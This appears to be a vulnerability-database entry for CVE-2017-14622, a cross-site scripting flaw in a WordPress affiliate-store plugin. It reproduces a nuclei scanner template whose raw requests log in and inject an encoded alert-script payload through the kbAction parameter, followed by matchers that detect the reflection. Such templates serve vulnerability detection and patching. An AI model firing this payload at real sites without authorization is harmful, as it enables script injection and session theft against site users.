Lucene search
K

WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting, allows injection of arbitrary web script or HTML via page and kbAction parameters to wp-admin/admin.php, leading to potential theft of sensitive information or unauthorized actions

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
WordPress 2kb Amazon Affiliates Store Plugin Has Multiple Cross-Site Scripting Vulnerabilities
28 Sep 201700:00
cnvd
CVE
CVE-2017-14622
27 Sep 201717:00
cve
Cvelist
CVE-2017-14622
27 Sep 201717:00
cvelist
EUVD
EUVD-2017-6123
7 Oct 202500:30
euvd
NVD
CVE-2017-14622
28 Sep 201701:29
nvd
Prion
Cross site scripting
28 Sep 201701:29
prion
WPVulnDB
2kb Amazon Affiliates Store <= 2.1.0 - Authenticated Cross-Site Scripting (XSS)
28 Sep 201700:00
wpvulndb
id: CVE-2017-14622

info:
  name: WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress 2kb Amazon Affiliates Store plugin before 2.1.1 contains multiple cross-site scripting vulnerabilities. The plugin allows an attacker to inject arbitrary web script or HTML via the (1) page parameter or (2) kbAction parameter in the kbAmz page to wp-admin/admin.php, thus making possible theft of cookie-based authentication credentials and launch of other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
  remediation: |
    Update the WordPress 2kb Amazon Affiliates Store plugin to version 2.1.1 or later to mitigate the vulnerability.
  reference:
    - https://packetstormsecurity.com/files/144261/WordPress-2kb-Amazon-Affiliates-Store-2.1.0-Cross-Site-Scripting.html
    - https://wordpress.org/plugins/2kb-amazon-affiliates-store/#developers
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14622
    - https://nvd.nist.gov/vuln/detail/CVE-2017-14622
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-14622
    cwe-id: CWE-79
    epss-score: 0.02892
    epss-percentile: 0.85037
    cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 2kblater
    product: 2kb_amazon_affiliates_store
    framework: wordpress
  tags: cve2017,cve,xss,wordpress,wp-plugin,wp,2kb-amazon-affiliates-store,authenticated,packetstorm,2kblater,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 500'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<script>alert(document.domain)</script>")'
          - 'contains(body_2, "2kb-amazon-affiliates-store")'
        condition: and
# digest: 490a004630440220758c51d3468561ae4c1457fac91ff0fc346111e90b3ecc761eb63a56ed7cfb0402205925ff542b14d714a2eb8dd9f8169ee35f1eac294d5b3a129259eecfea15f2f0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 24.3
CVSS 36.1
EPSS0.02892
25